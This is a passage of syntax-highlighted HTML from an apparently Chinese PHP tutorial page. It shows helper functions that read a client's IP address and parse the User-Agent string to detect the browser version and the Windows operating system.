style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Unknown</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip</span><span style="color: #89DDFF">;</span></span></code></pre></div><h4 id="PHP获取客户端(浏览器)信息函数"><a href="#PHP获取客户端(浏览器)信息函数" class="headerlink" title="PHP获取客户端(浏览器)信息函数"></a>PHP获取客户端(浏览器)信息函数</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">get_broswer</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP_USER_AGENT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//获取用户代理字符串 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Firefox/</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Firefox\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">^;)</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">+/i"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Firefox</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//获取火狐浏览器的版本号 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Maxthon</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Maxthon\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">aoyou</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">傲游</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">aoyou</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">MSIE</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">MSIE\s</span><span style="color: #89DDFF">+</span><span style="color: #C3E88D">(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">^;)</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">+/i"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ie</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">IE</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ie</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//获取IE的版本号 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">OPR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">OPR\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">opera</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Opera</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">opera</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Edge</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF"> </span><span style="color: #676E95; font-style: italic">//win10 Edge浏览器 添加了chrome内核标记 在判断Chrome之前匹配 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Edge\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">Edge</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Edge</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">Edge</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Chrome</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Chrome\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">google</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Chrome</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">google</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//获取google chrome的版本号 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">rv:</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)></span><span style="color: #F78C6C">0</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Gecko</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)></span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">){</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">rv:(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">IE</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">IE</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">IE</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">未知浏览器</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">""</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">(</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h4 id="获取客户端系统信息"><a href="#获取客户端系统信息" class="headerlink" title="获取客户端系统信息"></a>获取客户端系统信息</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">get_os</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP_USER_AGENT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">false;</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">strpos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">95</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 95</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win 9x</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">strpos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">4.90</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows ME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">98</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 98</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 6.0</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows Vista</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 6.1</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 7</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: 